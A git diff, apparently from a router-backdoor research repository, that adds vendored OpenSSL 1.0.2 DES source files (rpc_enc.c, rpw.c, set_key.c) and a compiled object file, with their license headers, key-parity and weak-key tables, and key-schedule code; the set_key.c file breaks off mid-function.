+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "rpc_des.h"
+#include "des_locl.h"
+#include "des_ver.h"
+
+int _des_crypt(char *buf, int len, struct desparams *desp);
+int _des_crypt(char *buf, int len, struct desparams *desp)
+{
+    DES_key_schedule ks;
+    int enc;
+
+    DES_set_key_unchecked(&desp->des_key, &ks);
+    enc = (desp->des_dir == ENCRYPT) ? DES_ENCRYPT : DES_DECRYPT;
+
+    if (desp->des_mode == CBC)
+        DES_ecb_encrypt((const_DES_cblock *)desp->UDES.UDES_buf,
+                        (DES_cblock *)desp->UDES.UDES_buf, &ks, enc);
+    else {
+        DES_ncbc_encrypt(desp->UDES.UDES_buf, desp->UDES.UDES_buf,
+                         len, &ks, &desp->des_ivec, enc);
+#ifdef undef
+        /*
+         * len will always be %8 if called from common_crypt in secure_rpc.
+         * Libdes's cbc encrypt does not copy back the iv, so we have to do
+         * it here.
+         */
+        /* It does now :-) eay 20/09/95 */
+
+        a = (char *)&(desp->UDES.UDES_buf[len - 8]);
+        b = (char *)&(desp->des_ivec[0]);
+
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+        *(a++) = *(b++);
+#endif
+    }
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..929856ab13d85cea6aae6ac4bf67b6a200f6969e
GIT binary patch
literal 1920
zcmbu9&1(};5WpuNwNcY;EFy)9?4e3UyCk+C_8|Fa(xog``XPdrHQB62)1)E0k;Z~j
zE8<cMJqZ3A9(%0lr8hyOSM?x*UPQczSZ8+MYhU8#q6058@3-^uKIY{?R?7tg0pJpV
zi?BcA6d)NEY}ZUe4@BX6?}?wOS=HH@bAHUI&Rccm>jr)<s%znsLujbZqroSr6I<GP
zaWJAepFUG`HnF|B907H0Sx)snd%3zCg+^@L+18wos`J}*`O>Ev@3i$yOmjYPrmlI}
zit31$-tKaJ)s@#&b(2<pZ9aAV6-;C@WAe~kp;5IP@&#o?i4P~vH{5CB{<*jkA3g11
zS`7+qFNUKF$Hb*M2m)*o3*jI+>M01^n})zrEHDu5j%;ALQRK(jx96mDQtWAPT<U)u
z%1H8Rcv5;12;P<CoYbF^VrePDd^;)HK^VU6`h5@i-VCjgud+2N<nF4K(JTZ9{)R5^
z?!f(59db{rHRLc(`-FA6XM*e)4m#g<Ig7xLr#tZJ4&3O#p<Xj|vuY>?=ta}gje4_Y
zgFc~6rBj+dmCMa!XZ6`sTFdG%o}JMx)7HyoQ*Ts_l4+F9qDxJqKuO$K@~RpIH>;OS
zx9q%8){RnGznQ<ifGYtQaeuwOqBHrm>&X>?M+JUI;5`C=C~!&OGUM2%)T{fVSj~!^
zFMwj%bx)VLRW}#%ifu00pcM0V9+ZM*fnqFHDrOZ~b<s8z?EPVPJ8XWd+E8ls#hO{S
zo1nNE%#wbyp0AkuHUGnsF_wD1y(5#zNO=EvGtZaXqz7=&J5Ayc<tlp;HyAvGn(FXQ
z?q~cI<LxhKhkb8XltUEiU&{Hf@d=EjoN*kY@cL&&h&Hd!^_aj!*C2Ngp^xt*GJ5qb
zJ%sZJi<i+Bg`Xd11vJRDJ${JAU*?WXx5v*T_q)GMcA)&8=>8~{$8+vin@TOQ`X#36
n4IcD~C)R#<h~PcjkWCXoSh_uO1TDY#Hw=3J27B&%_s7W}Oa#fl

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpw.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpw.c
new file mode 100644
index 0000000..ab65eac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpw.c
@@ -0,0 +1,94 @@
+/* crypto/des/rpw.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/des.h>
+
+int main(int argc, char *argv[])
+{
+    DES_cblock k, k1;
+    int i;
+
+    printf("read passwd\n");
+    if ((i = des_read_password(&k, "Enter password:", 0)) == 0) {
+        printf("password = ");
+        for (i = 0; i < 8; i++)
+            printf("%02x ", k[i]);
+    } else
+        printf("error %d\n", i);
+    printf("\n");
+    printf("read 2passwds and verify\n");
+    if ((i = des_read_2passwords(&k, &k1,
+                                 "Enter verified password:", 1)) == 0) {
+        printf("password1 = ");
+        for (i = 0; i < 8; i++)
+            printf("%02x ", k[i]);
+        printf("\n");
+        printf("password2 = ");
+        for (i = 0; i < 8; i++)
+            printf("%02x ", k1[i]);
+        printf("\n");
+        exit(1);
+    } else {
+        printf("error %d\n", i);
+        exit(0);
+    }
+#ifdef LINT
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.c
new file mode 100644
index 0000000..8fd8fe1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.c
@@ -0,0 +1,447 @@
+/* crypto/des/set_key.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+ * set_key.c v 1.4 eay 24/9/91
+ * 1.4 Speed up by 400% :-)
+ * 1.3 added register declarations.
+ * 1.2 unrolled make_key_sched a bit more
+ * 1.1 added norm_expand_bits
+ * 1.0 First working version
+ */
+#include <openssl/crypto.h>
+#include "des_locl.h"
+
+OPENSSL_IMPLEMENT_GLOBAL(int, DES_check_key, 0)
+                                                    /*
+                                                     * defaults to false
+                                                     */
+static const unsigned char odd_parity[256] = {
+    1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
+    16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
+    32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
+    49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
+    64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
+    81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
+    97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110,
+    110,
+    112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127,
+    127,
+    128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143,
+    143,
+    145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158,
+    158,
+    161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174,
+    174,
+    176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191,
+    191,
+    193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206,
+    206,
+    208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223,
+    223,
+    224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239,
+    239,
+    241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254,
+    254
+};
+
+void DES_set_odd_parity(DES_cblock *key)
+{
+    unsigned int i;
+
+    for (i = 0; i < DES_KEY_SZ; i++)
+        (*key)[i] = odd_parity[(*key)[i]];
+}
+
+int DES_check_key_parity(const_DES_cblock *key)
+{
+    unsigned int i;
+
+    for (i = 0; i < DES_KEY_SZ; i++) {
+        if ((*key)[i] != odd_parity[(*key)[i]])
+            return (0);
+    }
+    return (1);
+}
+
+/*-
+ * Weak and semi week keys as take from
+ * %A D.W. Davies
+ * %A W.L. Price
+ * %T Security for Computer Networks
+ * %I John Wiley & Sons
+ * %D 1984
+ * Many thanks to smb@ulysses.att.com (Steven Bellovin) for the reference
+ * (and actual cblock values).
+ */
+#define NUM_WEAK_KEY    16
+static const DES_cblock weak_keys[NUM_WEAK_KEY] = {
+    /* weak keys */
+    {0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01},
+    {0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE},
+    {0x1F, 0x1F, 0x1F, 0x1F, 0x0E, 0x0E, 0x0E, 0x0E},
+    {0xE0, 0xE0, 0xE0, 0xE0, 0xF1, 0xF1, 0xF1, 0xF1},
+    /* semi-weak keys */
+    {0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE},
+    {0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01},
+    {0x1F, 0xE0, 0x1F, 0xE0, 0x0E, 0xF1, 0x0E, 0xF1},
+    {0xE0, 0x1F, 0xE0, 0x1F, 0xF1, 0x0E, 0xF1, 0x0E},
+    {0x01, 0xE0, 0x01, 0xE0, 0x01, 0xF1, 0x01, 0xF1},
+    {0xE0, 0x01, 0xE0, 0x01, 0xF1, 0x01, 0xF1, 0x01},
+    {0x1F, 0xFE, 0x1F, 0xFE, 0x0E, 0xFE, 0x0E, 0xFE},
+    {0xFE, 0x1F, 0xFE, 0x1F, 0xFE, 0x0E, 0xFE, 0x0E},
+    {0x01, 0x1F, 0x01, 0x1F, 0x01, 0x0E, 0x01, 0x0E},
+    {0x1F, 0x01, 0x1F, 0x01, 0x0E, 0x01, 0x0E, 0x01},
+    {0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1, 0xFE},
+    {0xFE, 0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1}
+};
+
+int DES_is_weak_key(const_DES_cblock *key)
+{
+    int i;
+
+    for (i = 0; i < NUM_WEAK_KEY; i++)
+        /*
+         * Added == 0 to comparison, I obviously don't run this section very
+         * often :-(, thanks to engineering@MorningStar.Com for the fix eay
+         * 93/06/29 Another problem, I was comparing only the first 4 bytes,
+         * 97/03/18
+         */
+        if (memcmp(weak_keys[i], key, sizeof(DES_cblock)) == 0)
+            return (1);
+    return (0);
+}
+
+/*-
+ * NOW DEFINED IN des_local.h
+ * See ecb_encrypt.c for a pseudo description of these macros.
+ * #define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
+ *      (b)^=(t),\
+ *      (a)=((a)^((t)<<(n))))
+ */
+
+#define HPERM_OP(a,t,n,m) ((t)=((((a)<<(16-(n)))^(a))&(m)),\
+        (a)=(a)^(t)^(t>>(16-(n))))
+
+static const DES_LONG des_skb[8][64] = {
+    {
+     /* for C bits (numbered as per FIPS 46) 1 2 3 4 5 6 */
+     0x00000000L, 0x00000010L, 0x20000000L, 0x20000010L,
+     0x00010000L, 0x00010010L, 0x20010000L, 0x20010010L,
+     0x00000800L, 0x00000810L, 0x20000800L, 0x20000810L,
+     0x00010800L, 0x00010810L, 0x20010800L, 0x20010810L,
+     0x00000020L, 0x00000030L, 0x20000020L, 0x20000030L,
+     0x00010020L, 0x00010030L, 0x20010020L, 0x20010030L,
+     0x00000820L, 0x00000830L, 0x20000820L, 0x20000830L,
+     0x00010820L, 0x00010830L, 0x20010820L, 0x20010830L,
+     0x00080000L, 0x00080010L, 0x20080000L, 0x20080010L,
+     0x00090000L, 0x00090010L, 0x20090000L, 0x20090010L,
+     0x00080800L, 0x00080810L, 0x20080800L, 0x20080810L,
+     0x00090800L, 0x00090810L, 0x20090800L, 0x20090810L,
+     0x00080020L, 0x00080030L, 0x20080020L, 0x20080030L,
+     0x00090020L, 0x00090030L, 0x20090020L, 0x20090030L,
+     0x00080820L, 0x00080830L, 0x20080820L, 0x20080830L,
+     0x00090820L, 0x00090830L, 0x20090820L, 0x20090830L,
+     },
+    {
+     /* for C bits (numbered as per FIPS 46) 7 8 10 11 12 13 */
+     0x00000000L, 0x02000000L, 0x00002000L, 0x02002000L,
+     0x00200000L, 0x02200000L, 0x00202000L, 0x02202000L,
+     0x00000004L, 0x02000004L, 0x00002004L, 0x02002004L,
+     0x00200004L, 0x02200004L, 0x00202004L, 0x02202004L,
+     0x00000400L, 0x02000400L, 0x00002400L, 0x02002400L,
+     0x00200400L, 0x02200400L, 0x00202400L, 0x02202400L,
+     0x00000404L, 0x02000404L, 0x00002404L, 0x02002404L,
+     0x00200404L, 0x02200404L, 0x00202404L, 0x02202404L,
+     0x10000000L, 0x12000000L, 0x10002000L, 0x12002000L,
+     0x10200000L, 0x12200000L, 0x10202000L, 0x12202000L,
+     0x10000004L, 0x12000004L, 0x10002004L, 0x12002004L,
+     0x10200004L, 0x12200004L, 0x10202004L, 0x12202004L,
+     0x10000400L, 0x12000400L, 0x10002400L, 0x12002400L,
+     0x10200400L, 0x12200400L, 0x10202400L, 0x12202400L,
+     0x10000404L, 0x12000404L, 0x10002404L, 0x12002404L,
+     0x10200404L, 0x12200404L, 0x10202404L, 0x12202404L,
+     },
+    {
+     /* for C bits (numbered as per FIPS 46) 14 15 16 17 19 20 */
+     0x00000000L, 0x00000001L, 0x00040000L, 0x00040001L,
+     0x01000000L, 0x01000001L, 0x01040000L, 0x01040001L,
+     0x00000002L, 0x00000003L, 0x00040002L, 0x00040003L,
+     0x01000002L, 0x01000003L, 0x01040002L, 0x01040003L,
+     0x00000200L, 0x00000201L, 0x00040200L, 0x00040201L,
+     0x01000200L, 0x01000201L, 0x01040200L, 0x01040201L,
+     0x00000202L, 0x00000203L, 0x00040202L, 0x00040203L,
+     0x01000202L, 0x01000203L, 0x01040202L, 0x01040203L,
+     0x08000000L, 0x08000001L, 0x08040000L, 0x08040001L,
+     0x09000000L, 0x09000001L, 0x09040000L, 0x09040001L,
+     0x08000002L, 0x08000003L, 0x08040002L, 0x08040003L,
+     0x09000002L, 0x09000003L, 0x09040002L, 0x09040003L,
+     0x08000200L, 0x08000201L, 0x08040200L, 0x08040201L,
+     0x09000200L, 0x09000201L, 0x09040200L, 0x09040201L,
+     0x08000202L, 0x08000203L, 0x08040202L, 0x08040203L,
+     0x09000202L, 0x09000203L, 0x09040202L, 0x09040203L,
+     },
+    {
+     /* for C bits (numbered as per FIPS 46) 21 23 24 26 27 28 */
+     0x00000000L, 0x00100000L, 0x00000100L, 0x00100100L,
+     0x00000008L, 0x00100008L, 0x00000108L, 0x00100108L,
+     0x00001000L, 0x00101000L, 0x00001100L, 0x00101100L,
+     0x00001008L, 0x00101008L, 0x00001108L, 0x00101108L,
+     0x04000000L, 0x04100000L, 0x04000100L, 0x04100100L,
+     0x04000008L, 0x04100008L, 0x04000108L, 0x04100108L,
+     0x04001000L, 0x04101000L, 0x04001100L, 0x04101100L,
+     0x04001008L, 0x04101008L, 0x04001108L, 0x04101108L,
+     0x00020000L, 0x00120000L, 0x00020100L, 0x00120100L,
+     0x00020008L, 0x00120008L, 0x00020108L, 0x00120108L,
+     0x00021000L, 0x00121000L, 0x00021100L, 0x00121100L,
+     0x00021008L, 0x00121008L, 0x00021108L, 0x00121108L,
+     0x04020000L, 0x04120000L, 0x04020100L, 0x04120100L,
+     0x04020008L, 0x04120008L, 0x04020108L, 0x04120108L,
+     0x04021000L, 0x04121000L, 0x04021100L, 0x04121100L,
+     0x04021008L, 0x04121008L, 0x04021108L, 0x04121108L,
+     },
+    {
+     /* for D bits (numbered as per FIPS 46) 1 2 3 4 5 6 */
+     0x00000000L, 0x10000000L, 0x00010000L, 0x10010000L,
+     0x00000004L, 0x10000004L, 0x00010004L, 0x10010004L,
+     0x20000000L, 0x30000000L, 0x20010000L, 0x30010000L,
+     0x20000004L, 0x30000004L, 0x20010004L, 0x30010004L,
+     0x00100000L, 0x10100000L, 0x00110000L, 0x10110000L,
+     0x00100004L, 0x10100004L, 0x00110004L, 0x10110004L,
+     0x20100000L, 0x30100000L, 0x20110000L, 0x30110000L,
+     0x20100004L, 0x30100004L, 0x20110004L, 0x30110004L,
+     0x00001000L, 0x10001000L, 0x00011000L, 0x10011000L,
+     0x00001004L, 0x10001004L, 0x00011004L, 0x10011004L,
+     0x20001000L, 0x30001000L, 0x20011000L, 0x30011000L,
+     0x20001004L, 0x30001004L, 0x20011004L, 0x30011004L,
+     0x00101000L, 0x10101000L, 0x00111000L, 0x10111000L,
+     0x00101004L, 0x10101004L, 0x00111004L, 0x10111004L,
+     0x20101000L, 0x30101000L, 0x20111000L, 0x30111000L,
+     0x20101004L, 0x30101004L, 0x20111004L, 0x30111004L,
+     },
+    {
+     /* for D bits (numbered as per FIPS 46) 8 9 11 12 13 14 */
+     0x00000000L, 0x08000000L, 0x00000008L, 0x08000008L,
+     0x00000400L, 0x08000400L, 0x00000408L, 0x08000408L,
+     0x00020000L, 0x08020000L, 0x00020008L, 0x08020008L,
+     0x00020400L, 0x08020400L, 0x00020408L, 0x08020408L,
+     0x00000001L, 0x08000001L, 0x00000009L, 0x08000009L,
+     0x00000401L, 0x08000401L, 0x00000409L, 0x08000409L,
+     0x00020001L, 0x08020001L, 0x00020009L, 0x08020009L,
+     0x00020401L, 0x08020401L, 0x00020409L, 0x08020409L,
+     0x02000000L, 0x0A000000L, 0x02000008L, 0x0A000008L,
+     0x02000400L, 0x0A000400L, 0x02000408L, 0x0A000408L,
+     0x02020000L, 0x0A020000L, 0x02020008L, 0x0A020008L,
+     0x02020400L, 0x0A020400L, 0x02020408L, 0x0A020408L,
+     0x02000001L, 0x0A000001L, 0x02000009L, 0x0A000009L,
+     0x02000401L, 0x0A000401L, 0x02000409L, 0x0A000409L,
+     0x02020001L, 0x0A020001L, 0x02020009L, 0x0A020009L,
+     0x02020401L, 0x0A020401L, 0x02020409L, 0x0A020409L,
+     },
+    {
+     /* for D bits (numbered as per FIPS 46) 16 17 18 19 20 21 */
+     0x00000000L, 0x00000100L, 0x00080000L, 0x00080100L,
+     0x01000000L, 0x01000100L, 0x01080000L, 0x01080100L,
+     0x00000010L, 0x00000110L, 0x00080010L, 0x00080110L,
+     0x01000010L, 0x01000110L, 0x01080010L, 0x01080110L,
+     0x00200000L, 0x00200100L, 0x00280000L, 0x00280100L,
+     0x01200000L, 0x01200100L, 0x01280000L, 0x01280100L,
+     0x00200010L, 0x00200110L, 0x00280010L, 0x00280110L,
+     0x01200010L, 0x01200110L, 0x01280010L, 0x01280110L,
+     0x00000200L, 0x00000300L, 0x00080200L, 0x00080300L,
+     0x01000200L, 0x01000300L, 0x01080200L, 0x01080300L,
+     0x00000210L, 0x00000310L, 0x00080210L, 0x00080310L,
+     0x01000210L, 0x01000310L, 0x01080210L, 0x01080310L,
+     0x00200200L, 0x00200300L, 0x00280200L, 0x00280300L,
+     0x01200200L, 0x01200300L, 0x01280200L, 0x01280300L,
+     0x00200210L, 0x00200310L, 0x00280210L, 0x00280310L,
+     0x01200210L, 0x01200310L, 0x01280210L, 0x01280310L,
+     },
+    {
+     /* for D bits (numbered as per FIPS 46) 22 23 24 25 27 28 */
+     0x00000000L, 0x04000000L, 0x00040000L, 0x04040000L,
+     0x00000002L, 0x04000002L, 0x00040002L, 0x04040002L,
+     0x00002000L, 0x04002000L, 0x00042000L, 0x04042000L,
+     0x00002002L, 0x04002002L, 0x00042002L, 0x04042002L,
+     0x00000020L, 0x04000020L, 0x00040020L, 0x04040020L,
+     0x00000022L, 0x04000022L, 0x00040022L, 0x04040022L,
+     0x00002020L, 0x04002020L, 0x00042020L, 0x04042020L,
+     0x00002022L, 0x04002022L, 0x00042022L, 0x04042022L,
+     0x00000800L, 0x04000800L, 0x00040800L, 0x04040800L,
+     0x00000802L, 0x04000802L, 0x00040802L, 0x04040802L,
+     0x00002800L, 0x04002800L, 0x00042800L, 0x04042800L,
+     0x00002802L, 0x04002802L, 0x00042802L, 0x04042802L,
+     0x00000820L, 0x04000820L, 0x00040820L, 0x04040820L,
+     0x00000822L, 0x04000822L, 0x00040822L, 0x04040822L,
+     0x00002820L, 0x04002820L, 0x00042820L, 0x04042820L,
+     0x00002822L, 0x04002822L, 0x00042822L, 0x04042822L,
+     }
+};
+
+int DES_set_key(const_DES_cblock *key, DES_key_schedule *schedule)
+{
+    if (DES_check_key) {
+        return DES_set_key_checked(key, schedule);
+    } else {
+        DES_set_key_unchecked(key, schedule);
+        return 0;
+    }
+}
+
+/*-
+ * return 0 if key parity is odd (correct),
+ * return -1 if key parity error,
+ * return -2 if illegal weak key.
+ */
+int DES_set_key_checked(const_DES_cblock *key, DES_key_schedule *schedule)
+{
+    if (!DES_check_key_parity(key))
+        return (-1);
+    if (DES_is_weak_key(key))
+        return (-2);
+    DES_set_key_unchecked(key, schedule);
+    return 0;
+}
+
+void DES_set_key_unchecked(const_DES_cblock *key, DES_key_schedule *schedule)
+#ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(DES);
+    private_DES_set_key_unchecked(key, schedule);
+}
+
+void private_DES_set_key_unchecked(const_DES_cblock *key,
+                                   DES_key_schedule *schedule)
+#endif
+{
+    static const int shifts2[16] =
+        { 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0 };
+    register DES_LONG c, d, t, s, t2;
+    register const unsigned char *in;
+    register DES_LONG *k;
+    register int i;
+
+#ifdef OPENBSD_DEV_CRYPTO
+    memcpy(schedule->key, key, sizeof schedule->key);
+    schedule->session = NULL;
+#endif
+    k = &schedule->ks->deslong[0];
+    in = &(*key)[0];
+
+    c2l(in, c);
+    c2l(in, d);
+
+    /*
+     * do PC1 in 47 simple operations :-) Thanks to John Fletcher
+     * (john_fletcher@lccmail.ocf.llnl.gov) for the inspiration. :-)
+     */
+    PERM_OP(d, c, t, 4, 0x0f0f0f0fL);
+    HPERM_OP(c, t, -2, 0xcccc0000L);
+    HPERM_OP(d, t, -2, 0xcccc0000L);
+    PERM_OP(d, c, t, 1, 0x55555555L);
+    PERM_OP(c, d, t, 8, 0x00ff00ffL);
+    PERM_OP(d, c, t, 1, 0x55555555L);
+    d = (((d & 0x000000ffL) << 16L) | (d & 0x0000ff00L) |
